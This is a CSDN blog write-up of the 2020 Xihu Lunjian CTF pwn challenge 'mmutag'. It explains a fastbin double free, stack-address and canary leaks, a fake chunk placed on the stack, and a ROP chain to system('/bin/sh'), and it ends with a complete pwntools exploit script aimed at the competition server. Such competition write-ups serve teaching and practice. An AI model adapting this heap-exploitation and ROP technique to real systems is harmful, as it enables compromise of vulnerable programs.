西湖论剑2020 pwn mmutag wp

最新推荐文章于 2024-04-17 02:45:33 发布
最新推荐文章于 2024-04-17 02:45:33 发布
阅读量464 收藏 1
点赞数 3
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45677731/article/details/109011769
版权

拿到题目,给了libc库,太可了,爱了爱了
在这里插入图片描述
开局malloc(0x68)输入姓名,这个0x68给人一种熟悉的感觉
程序会顺便输出保存着chunk指针的栈地址,暂时没发现有什么吊用
在这里插入图片描述
heap的部分,只有malloc和free的功能
并且固定申请0x68的chunk
在这里插入图片描述
free这里,出现了经典的free之后未置0
而且还刚好是0x68的chunk
常见做法就是double free后劫持malloc_hook
然后就是泄露libc基地址
始终没找到什么好办法,泄露出来的栈地址看似也无法得到libc_base
这时候发现了出题者骗人的地方
在这里插入图片描述
menu上明明写着输入3退出,但其实输入3并不会退出,只会给你一个输入的机会,然后再把你输入的东西输出
选择4才是真正的exit
这里read又输出,就有了泄露栈上数据的机会
在这里插入图片描述
但是,调试之后发现,下面貌似并没有能够泄露libc_base的数据
然后就发现了这两个东西
在这里插入图片描述
靠,这不canary么
再仔细想想看,给了某个栈地址,给了泄露canary的办法,给了劫持chunk分配到某个地址的机会。。。。。。
难道真是把chunk分配到栈上?可恶
经过了一段时间的发呆之后,开始动手
canary下面的0x7fffffffde20就是rbp,再下面0x400c9e就是返回地址

#leak stack_addr
sh.recvuntil("please input you name: \n")
sh.sendline("aaaa")
sh.recvuntil("0x")
stack_addr=int(sh.recv(12),16)
print hex(stack_addr)

先泄露栈地址

sh.recvuntil("please input your choice:\n")
sh.sendline("2")
#leak canary
sh.recvuntil("please input your choise:")
sh.sendline("3")
payload='a'*16+'c'*8
sh.sendline(payload)
sh.recvuntil('cccccccc')
canary=u64(sh.recv(8))-0xa
print hex(canary)

再泄露canary

#add two chunk
add(1,'aaaa')
add(2,'bbbb')
#double free
delete(1)
delete(2)
delete(1)

然后就是double free

#change fd
payload=p64(stack_addr-0x40)
add(3,payload)
add(4,'cccc')
add(5,'dddd')

再add回来,把fd指针改掉
这个0x40是怎么来的呢,调试出来的
在这里插入图片描述
如图,0x7fffffffde10-0x7fffffffddd0=0x40

下面这步需要注意
我们要往栈里面写入0x71来通过对chunk_size的检测
也就是说先写p64(0)+p64(0x71)
如果后面要返回到main函数的话
紧接着,要写p64(0)

因为当malloc到这个fake chunk这里的时候,如果fd指针是一个任意值,例如0x6161616161616161
那么下一次再分配0x70大小的chunk时,就会到0x6161616161616161地址处去分配,就会出错了,由于返回到的是main函数,程序一开始输入name的时候就会自动malloc(0x68),所以是不行的
而如果这个值是0的话,系统就会认为fastbin中的0x70大小的chunk已经取完了,下一次malloc(0x68)的时候,就会去top chunk里面分配了

当然如果后面不返回到main函数的话,fd的值就不用考虑了

#write size(0x71) for chunk
sh.recvuntil("please input your choise:")
sh.sendline("3")
payload=p64(0)+p64(0x71)
sh.sendline(payload)

写chunk_size

#familar ROP!!!
payload="a"*8+p64(canary)
payload+="b"*8+p64(poprdi)+p64(puts_got)
#return to sub_400a99
payload+=p64(puts_plt)+p64(0x400a99)
add(6,payload)
sh.recvuntil("please input your choise:")
sh.sendline("4")
#leak libc_base
puts_addr=u64(sh.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
libc_base=puts_addr-libc.symbols["puts"]
system_addr=libc_base+libc.symbols["system"]
binsh=libc_base+libc.search("/bin/sh").next()
info("libc_base:0x%x",libc_base)

熟悉的ROP,泄露puts_got,返回到函数sub_400a99
选择“4”退出来触发leave和retn
计算libc_base和system_addr和binsh_addr

好了,地址泄露成功了,接下来故技重施

#try again
sh.recvuntil("please input your choise:")
sh.sendline("3")
payload=p64(0)+p64(0x71)
sh.sendline(payload)
delete(1)
delete(2)
delete(1)

payload=p64(stack_addr-0x20)
add(7,payload)
add(8,'cccc')
add(9,'dddd')

这里的-0x20也是调试出来的

payload="a"*8+p64(canary)
payload+="b"*8+p64(poprdi)+p64(binsh)
payload+=p64(system_addr)+p64(main)
add(10,payload)
sh.recvuntil("please input your choise:")
sh.sendline("4")
sh.interactive()

好了,搞定了
下面是我的完整exp:

from pwn import *
sh=remote("183.129.189.61",52004)
#sh=process("./mmutag")
context.log_level='debug'
elf=ELF("./mmutag")
libc=ELF("./libc.so.6")
puts_plt=elf.plt["puts"]
puts_got=elf.got["puts"]
main=0x400bf1
poprdi=0x400d23

def add(id,content):
	sh.recvuntil("please input your choise:\n")
	sh.sendline("1")
	sh.recvuntil("please input your id:\n")
	sh.sendline(str(id))
	sh.recvuntil("input your content\n")
	sh.send(content)
def delete(id):
	sh.recvuntil("please input your choise:\n")
	sh.sendline("2")
	sh.recvuntil("please input your id:\n")
	sh.sendline(str(id))

#leak stack_addr
sh.recvuntil("please input you name: \n")
sh.sendline("aaaa")
sh.recvuntil("0x")
stack_addr=int(sh.recv(12),16)
print hex(stack_addr)
sh.recvuntil("please input your choice:\n")
sh.sendline("2")

#leak canary
sh.recvuntil("please input your choise:")
sh.sendline("3")
payload='a'*16+'c'*8
sh.sendline(payload)
sh.recvuntil('cccccccc')
canary=u64(sh.recv(8))-0xa
print hex(canary)

#add two chunk
add(1,'aaaa')
add(2,'bbbb')

#double free
delete(1)
delete(2)
delete(1)

#change fd
payload=p64(stack_addr-0x40)
add(3,payload)
add(4,'cccc')
add(5,'dddd')

#write size(0x71) for chunk
sh.recvuntil("please input your choise:")
sh.sendline("3")
payload=p64(0)+p64(0x71)
sh.sendline(payload)

#familar ROP!!!
payload="a"*8+p64(canary)
payload+="b"*8+p64(poprdi)+p64(puts_got)
#return to sub_400a99
payload+=p64(puts_plt)+p64(0x400a99)
add(6,payload)
sh.recvuntil("please input your choise:")
sh.sendline("4")

#leak libc_base
puts_addr=u64(sh.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
libc_base=puts_addr-libc.symbols["puts"]
system_addr=libc_base+libc.symbols["system"]
binsh=libc_base+libc.search("/bin/sh").next()
info("libc_base:0x%x",libc_base)

#try again
sh.recvuntil("please input your choise:")
sh.sendline("3")
payload=p64(0)+p64(0x71)
sh.sendline(payload)

delete(1)
delete(2)
delete(1)

payload=p64(stack_addr-0x20)
add(7,payload)
add(8,'cccc')
add(9,'dddd')

payload="a"*8+p64(canary)
payload+="b"*8+p64(poprdi)+p64(binsh)
payload+=p64(system_addr)+p64(main)
add(10,payload)
sh.recvuntil("please input your choise:")
sh.sendline("4")
sh.interactive()
R1nd0
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
PWN 强网杯2020siri 题目
09-21
PWN 强网杯2020siri 题目
PWN-shellcode-WP- (一)题目文件.rar
03-29
为几道搜集的真题,https://blog.csdn.net/qq_43390703/article/details/105181147中有对他们的详细解答,是学习pwn入门的很好练手和熟悉知识点以及pwn技巧的真题。
2024西湖论剑-数据安全-PHPEMS_西湖论剑2024wp(1),网络安全架构师之路
最新发布
code8889的博客
04-17 392
phar触发点在 app/weixin/controller/index.api.php 中的file_getcontents,其中$picurl从xml数据中获取。exec中 虽然说用到了预处理,但是是prepare部分我们仍可以控制,那么这个预处理即使在这里那也是无效的,并不能防止注入。使用上面的exp我们就能把后台密码修改为123456,进入后台就能RCE,这个我们下面在写。题目给的源码中有几个点可以触发注入,但是能用的只有一个点,因为其他的php类没有被加载(利用substr截取。
pwn ubuntu18的运行环境自己搭建
11-15
pwn ubuntu18的运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
GKCTF2020.zip
07-20
GKCTF2020 逆向 pwn等赛题,除web题外均有
FLASH五字棋游戏附源文件.rar
07-10
FLASH五字棋游戏附源文件,运用了ActionScript 3.0的动画编程技术实现,涉及一些高级编程,了解一下源码有助于提高Flash的AS脚本编程技术。本款五子棋游戏效果图如截图所示。
2023西湖论剑-(部分)WP
xccwxy的博客
02-03 2263
2023西湖论剑-(部分)WP
后记:2020西湖论剑逆向babyre的wp
sln_1550的博客
10-12 692
这个题目对我而言太难了,比赛的时候只做了个crypto简单题和逆向的flow,这个babyre没时间看,赛后花了2天才搞出来。 题目是个PE32的可执行程序,体积挺大的,调试的时候一直报非法指令,应该是有反调试的措施。 用x64dbg也是一样,看来动态调试这条路是走不通了,干脆耐心的分析代码。 首先根据报错,查到主程序逻辑是在sub_1543D0里: 这里是一个虚机,具体代码在开头会有初始化: 右边注释是我手工写的 0x01, 0x63, 0x00, load strings 0 & output
2023西湖论剑pwn 部分wp
cainiao78777的博客
02-18 597
也就是*(&v3 + i) = v0 修改一个字节的内容,但是我们也要解一下这个方程,以免程序被exit()而且在buf的下面的变量都是能够覆盖的,也就是说,我们能通过覆盖 i 的值进行数组溢出。一个格式化字符串漏洞,一个栈溢出,但是只能副盖rbp和返回地址,所有要考虑栈迁移。我看有个大佬的解法很奇特,准备学习一下,待我学成,再来补充另外一种方法。泄露出这个函数地址,就能得到 libc——base。根据距离rbp的距离将相应的变量填入。这里的main指的是start,第二次getshell。
2021西湖论剑网络安全大赛部分WP
七堇年的博客
12-23 4533
2021西湖论剑网络安全大赛WP
安卓短信彩信相关相关-android零权限发送短信支持android4.0以上版本。.rar
07-29
android 零权限发送短信,支持android 4.0以上版本。.rar,太多无法一一验证是否可用,程序如果跑不起来需要自调,部分代码功能进行参考学习。
PWN.rar_PWN
09-24
本代码是在Keil uVision3环境下使用c语言编写的。功能是使用片内pgaPWN输出占空比可变的方波。
Tcms个人网站系统顽石修改版 v1.2.rar
07-07
本系统由dafi编写,程序版权归原作者所有。本人(顽石,下同)在遵循原作者版权声明之基础上,加以修改和优化,已得现有版本。本人不承担使用者因使用此版本程序所造成的任何损失及其连带责任,任何人使用本程序,即代表其同意原作者版权声明及本使用条款的约束。(本程序已经更新2009.09.07的所有补丁) 附原作者对程序的版权声明: “此系统由dafi编写,你可以无条件的使用和修改,但请勿用作任何商业用途。” (一) 界面优化 1. 在原有经典黑色模板的基础上,全站修改成粉色,比较适合女生 2. 增加背景图片属性,满足不同美工需求 3. 修改head部的banner为大图,直观大方 4. 修改导航条和搜索栏,更加严谨紧凑 5. 增加前台滚动广告功能,利用了已有的广告功能进行管理 6. 修改首页官方论坛登陆框为后台管理登陆进口,更加实用性 7. 修改首页内容模块为8栏(原来为7),界面更为美观 8. 底部广告位的细节优化 (二) 数据库优化 1. 增加数据表前缀,使之更加合理和易用 2. 增加自动安装栏目数,并自动嵌入前台显示,免去修改index模板 (三) 后台优化 1. 更正后台评论和留言审核的错误 2. 修改编辑器的链接目录,安装在二级目录之下也无需调整其位置 3. 全部6个广告位已经全部应用到确切位置
2022西湖论剑pwn部分wp
N1rvana的博客
02-05 798
西湖论剑2022pwn
2021西湖论剑wp
qq_48511129的博客
11-22 1030
web OA?RCE? ⽐赛的时候试了下不是弱⼝令(实际上就是admin123,但当时忘试这个了),所以就去⽹上找了改密码 的⽅式,⽤这⾥的⽅法:信呼oa最新版本代码审计 - ma4ter $test = $this->jm- >strlook(json_encode(array("msgtype"=>"editpass","user"=>"admin","pass"=>"lighting")), 'd41d8cd98f00b2...
2021“西湖论剑“网络安全大赛Writeup
Le1a's Blog
11-21 9232
2021"西湖论剑"网络安全大赛Writeup 我只写了自己做的部分,完整WP请访问下载:https://wwe.lanzoui.com/i2XlFwqd4gb 密码:Le1a Web 详见fmyyy师傅:https://blog.csdn.net/fmyyy1/article/details/121451279?spm=1001.2014.3001.5501 Misc 真·签到 扫码关注公众号,发送语音即可 flag: DASCTF{welc0m3_t0_9C51s_2021} YUSA的小秘密
2022西湖论剑-初赛CTF部分wp-Zodiac
toto的博客
02-03 3100
2023西湖论剑初赛CTF部分wp
ctfwiki堆溢出总结
eeeeeight的博客
04-12 826
堆溢出小总结 Column: Apr 12, 2021 Tags: Pwn, summary 开头的一些碎碎念: 除了fastbin大小的chunk,其余物理相邻topchunk的chunk在free之后都会合并进topchunk 利用malloc_hook通常是在main_arena-0x23-8的位置有个0x7f可以被识别为fakechunk(free_hook还不会,悲) Uaf: 堆被free之后,指向其的指针未被置空导致fd与bk之类的关键信息可以被编辑, 还有一种就是double free之类的
docker pwn
01-29
Docker Pwn是一种使用Docker容器来解决CTF(Capture The Flag)挑战的方法。它提供了一个轻量级的环境,可以在其中运行和调试二进制文件,以便进行漏洞利用和渗透测试。 要使用Docker Pwn,您可以按照以下步骤进行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值